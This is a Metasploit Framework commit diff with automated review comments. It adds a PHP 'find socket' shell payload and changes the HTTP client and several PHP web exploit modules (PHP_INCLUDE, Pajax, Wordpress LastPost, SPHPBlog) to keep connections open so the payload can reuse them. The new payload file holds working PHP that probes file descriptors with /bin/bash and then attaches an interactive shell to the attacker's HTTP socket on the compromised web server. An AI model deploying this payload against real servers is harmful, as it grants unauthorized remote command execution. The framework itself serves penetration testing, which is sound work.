initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs.
git-svn-id: file:///home/svn/framework3/trunk@5678 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
ddc47955f2
commit
36a06e7576
@ -36,6 +36,10 @@ class CommandShell
"Command shell"
end
def run_cmd(cmd)
write_shell(cmd)
return rstream.get
end
#
# Calls the class method.
#
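Review bot: `run_cmd` is added without the `#`-framed comment block that the neighbouring methods in this class carry (the block right after it documents the next method), so the file's documentation style breaks at the new definition. A header in the same `#` / `# …` / `#` shape reading `# Writes cmd to the shell and returns whatever rstream.get yields next.` would match. Whether `rstream.get` returns only what is immediately available or waits for the command to finish is not visible here, so the comment should not promise a complete command result.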
@ -54,7 +58,12 @@ class CommandShell
# Read from the command shell.
#
def read_shell(length = nil)
return rstream.read(length)
if length.nil?
rv = rstream.get
else
rv = rstream.read(length)
end
return rv
end
#
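Review bot: The new body of `read_shell` spells a two-way choice as an if/else that assigns `rv` and then returns it, which is heavier than the surrounding methods in this class; `rstream.get` and `rstream.read(length)` are the only two outcomes. The whole body can be the single expression `length.nil? ? rstream.get : rstream.read(length)`. The `# Read from the command shell.` comment above the method should also say that a nil length now reads whatever `rstream.get` yields rather than a fixed-size chunk, since that is the behaviour change this hunk introduces.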
@ -110,13 +110,15 @@ module Exploit::Remote::HttpClient
)
# If this connection is global, persist it
if (opts['global'])
# No reason for the socket not to be global and it allows findsock to
# work.
#if (opts['global'])
if (self.client)
disconnect
end
self.client = nclient
end
#end
return nclient
end
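Review bot: The comment `# If this connection is global, persist it` and the commented-out `#if (opts['global'])` / `#end` pair now describe a condition the code no longer evaluates: every connection replaces `self.client`, and an existing client is disconnected first even for callers that never asked for a persistent connection. The `'global' => true` option that the PHP_INCLUDE hunk of this same commit passes to `send_request_raw` is therefore silently ignored here. Replace the stale comment and the dead `#if`/`#end` lines with one that states the new contract, e.g. `# Every connection is kept in self.client (the 'global' option is ignored) so a find-shell payload can reuse the socket; any earlier client is disconnected first.`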
@ -123,6 +123,8 @@ protected
Rex::ThreadSafe.sleep(1.5)
end
# Make sure the read buffer is empty before we test for a shell
sock.get_once(-1,1)
# Check to see if the shell exists
sock.put("\necho #{ebuf}\n")
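Review bot: The added `sock.get_once(-1,1)` discards whatever it reads and carries two bare numbers; the comment above says what is intended but not what the arguments mean. Suggest `# drain anything already buffered (read-all, 1s wait) so the echo probe below only sees its own output` — confirm the argument meaning against Rex's get_once before committing to that wording. If get_once raises on a closed peer rather than returning nil, the probe is abandoned at this line; the enclosing method starts outside the hunk, so it is not visible whether that is rescued.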
@ -24,7 +24,8 @@ class Msf::Module::Author
'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl',
'patrick' => 'patrick' + 0x40.chr + 'aushack.com',
'ramon' => 'ramon' + 0x40.chr + 'risesecurity.org',
'I)ruid' => 'druid' + 0x40.chr + 'caughq.org'
'I)ruid' => 'druid' + 0x40.chr + 'caughq.org',
'egypt' => 'egypt' + 0x40.chr + 'metasploit.com'
}
#
@ -95,7 +95,14 @@ protected
# Check to see if the user wants to abort.
#
def _interrupt
begin
user_want_abort?
rescue Interrupt
# The user hit ctrl-c while we were handling a ctrl-c, send a
# literal ctrl-c to the shell. XXX Doesn't actually work.
#$stdout.puts("\n[*] interrupted interrupt, sending literal ctrl-c\n")
#$stdout.puts(run_cmd("\x03"))
end
end
#
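Review bot: The new `rescue Interrupt` in `_interrupt` has a body made only of comments, so a second ctrl-c is swallowed with no feedback and the method returns nil instead of whatever `user_want_abort?` would have returned; the comment itself records that the intended behaviour `XXX Doesn't actually work`. If callers use the return value, the rescue path should return an explicit value and the comment should say which (for instance `true` if a double ctrl-c is meant to count as an abort); if they do not, drop the two commented-out `$stdout.puts` lines rather than leaving them as the only body. Either way the comment should state what a second ctrl-c does now, not what it was meant to do.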
@ -54,6 +54,7 @@ module Stream
# This method reads data of the supplied length from the stream.
#
def read(length = nil, opts = {})
# XXX handle length being nil
begin
fd.sysread(length)
rescue IOError
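Review bot: `read(length = nil, opts = {})` passes `length` straight to `fd.sysread(length)`, and the added `# XXX handle length being nil` admits the default is not handled: if `fd` is a core IO, `sysread(nil)` raises TypeError, which the `rescue IOError` on the next line does not catch, so a caller relying on the default gets an unrelated exception instead of a read. Either make the parameter required or resolve it before the read, e.g. `raise ArgumentError, 'length must be given' if length.nil?` at the top of the method, and say in the method comment what nil means. The begin/rescue continues outside the hunk.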
@ -315,7 +315,7 @@ class Client
resp.max_data = config['read_max_data']
# Tell the remote side if we aren't pipelining
conn.shutdown(::Socket::SHUT_WR) if (!pipelining?)
#conn.shutdown(::Socket::SHUT_WR) if (!pipelining?)
# Wait at most t seconds for the full response to be read in. We only
# do this if t was specified as a negative value indicating an infinite
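Review bot: `# Tell the remote side if we aren't pipelining` now heads a commented-out line, so the comment promises a half-close (`shutdown(SHUT_WR)`) that no longer happens. A server that waits for the client's write side to close before answering will now sit until the read timeout handled below expires; whether any target behaves that way is not visible here, but the change deserves a sentence in the code. Replace the stale comment and the dead line with one stating the new behaviour, e.g. `# Never half-close the write side: the socket may be handed to a find-shell payload after the response.`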
@ -369,15 +369,17 @@ class Client
end
rescue EOFError
return nil
rescue ::TimeoutError, ::Timeout::Error
#$stdout.puts("timeout\n")
end
} if (t)
# Close our side if we aren't pipelining
close if (!pipelining?)
#close if (!pipelining?)
# if the server said stop pipelining, we listen...
if resp['Connection'] == 'close'
close
#close
end
# XXX - How should we handle this?
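Review bot: `if resp['Connection'] == 'close'` is left with a body consisting only of `#close`, so the conditional does nothing, and with `close if (!pipelining?)` also commented out this method no longer closes the connection on any path: a caller that does not close it leaks one socket per request, and the server's explicit request to close is ignored. Rather than deleting both closes, gate them on whatever the caller uses to ask for a reusable connection (a flag on this client, set by the code that hands the socket to a find-shell payload), or at least remove the empty conditional and state the new contract in its place, e.g. `# The connection is kept open regardless of pipelining or Connection: close so a find-shell payload can reuse it; the caller owns closing it.` The begin/rescue chain whose tail is visible at the top of this hunk starts outside it.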
@ -43,6 +43,10 @@ class Exploits::Unix::Webapp::Pajax_Execute < Msf::Exploit::Remote
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'ConnectionType' => 'find',
},
'Space' => 4000,
},
'Platform' => 'php',
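Review bot: The `'Compat'` block added to this module's Payload info carries no explanation, while the identical block in the PHP_INCLUDE hunk of this commit has a three-line comment saying why `'ConnectionType' => 'find'` is declared; the same gap is in the Wordpress_LastPost_Execution and SPHPBlog_File_Upload hunks. Copy that comment to all three, but word it for what holds after this commit: its sentence about `{'global' => true}` is not accurate, since the HttpClient hunk makes every connection global regardless of that option. Whether this block restricts the selectable payloads to find-type connections or merely declares that they work is not visible here and is worth stating in the comment, as it decides whether the previously usable payloads for these modules are still offered.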
@ -26,7 +26,7 @@ class Exploits::Unix::Webapp::PHP_INCLUDE < Msf::Exploit::Remote
'Description' => %q{
Exploits things like <?php include($_GET['path']); ?>
},
'Author' => [ 'hdm' , 'egypt <egypt@nmt.edu>'],
'Author' => [ 'hdm' , 'egypt' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
@ -37,6 +37,13 @@ class Exploits::Unix::Webapp::PHP_INCLUDE < Msf::Exploit::Remote
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
# By adding {'global' => true} to the connect
# options we get find shell compatibility for free
# in php exploits.
'ConnectionType' => 'find',
},
'Space' => 32768,
},
'Platform' => 'php',
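Review bot: The comment `By adding {'global' => true} to the connect options we get find shell compatibility for free` describes a mechanism this same commit disables: the HttpClient hunk comments out `if (opts['global'])`, so the `'global' => true` added to `send_request_raw` in the next hunk of this file is never consulted and every connection is persisted anyway. Either keep the `opts['global']` check in HttpClient so the comment and the option stay true, or reword the comment to `# ConnectionType 'find' lets the payload reuse the HTTP socket, which connect() now always keeps open.` and drop the dead `'global' => true` key from the request. As written, a reader of this module will look for a check that does not exist.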
@ -57,8 +64,9 @@ class Exploits::Unix::Webapp::PHP_INCLUDE < Msf::Exploit::Remote
timeout = 0.01
uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.uri_encode(php_include_url))
print_status("Trying uri #{uri}")
response = send_request_raw({ 'uri' => uri },timeout)
response = send_request_raw({ 'global' => true, 'uri' => uri },timeout)
handler
end
end
@ -42,6 +42,10 @@ class Exploits::Unix::Webapp::Wordpress_LastPost_Execution < Msf::Exploit::Remot
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'ConnectionType' => 'find',
},
'Space' => 512,
},
'Platform' => 'php',
@ -45,6 +45,10 @@ class Exploits::Unix::Webapp::SPHPBlog_File_Upload < Msf::Exploit::Remote
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'ConnectionType' => 'find',
},
'Space' => 1024,
},
'Platform' => 'php',
@ -0,0 +1,93 @@
##
# $Id: bind_php.rb 5546 2008-07-01 01:44:56Z egypt $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
require 'msf/core/payload/php'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/core/handler/find_shell'
module Msf
module Payloads
module Singles
module Php
module ShellFindsock
include Msf::Payload::Single
include Msf::Payload::Php
def initialize(info = {})
super(merge_info(info,
'Name' => 'PHP Command Shell, Find Port',
'Version' => '$Revision: 5546 $',
'Description' => %Q{
Spawn a shell on the established connection to
the webserver. Only tested on Apache but it
might work on other web servers that leak file
descriptors to child processes.
},
'Author' => [ 'egypt <egypt@metasploit.com>' ],
'License' => BSD_LICENSE,
'Platform' => 'php',
'Handler' => Msf::Handler::FindShell,
'Session' => Msf::Sessions::CommandShell,
'Arch' => ARCH_PHP
))
end
def php_findsock
#cmd = Rex::Text.encode_base64(datastore['CMD'])
dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
shell = <<END_OF_PHP_CODE
error_reporting(E_ALL);
print("<html><body>");
flush();
error_log("Looking for file descriptor");
$fd = 13;
for ($i = 3; $i < 50; $i++) {
$foo = system("/bin/bash 2>/dev/null <&$i -c 'echo $i'");
if ($foo != $i) {
$fd = $i - 1;
break;
}
}
error_log("Found it ($fd)");
print("</body></html>\n\n");
flush();
$c = "/bin/bash <&$fd >&$fd 2>&$fd";
system($c);
END_OF_PHP_CODE
#function mysystem(){
# #{php_preamble({:disabled_varname => dis})}
# #{php_system_block({:cmd_varname=>'$c', :disabled_varname => dis, :output_varname => '$out'})}
# return $out;
#}
return shell
end
#
# Constructs the payload
#
def generate
return php_findsock
end
end
end end end end
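Review bot: The new file's `$Id: bind_php.rb …` header names the file it was copied from rather than this one, and the copy left unused pieces behind: `require 'msf/core/handler/bind_tcp'` although the module declares `Msf::Handler::FindShell` as its handler, the local `dis` in `php_findsock` that is referenced only from the commented-out `#function mysystem` block, and the commented-out `#cmd = …` line. Drop those, or if `mysystem` is still planned, say so in a `# TODO` instead of keeping dead code that will drift from the helpers it calls. `php_findsock` is also the only method here without a `#`-framed header; one such as `# Builds the PHP source that generate returns verbatim.` would match the `# Constructs the payload` block on `generate`.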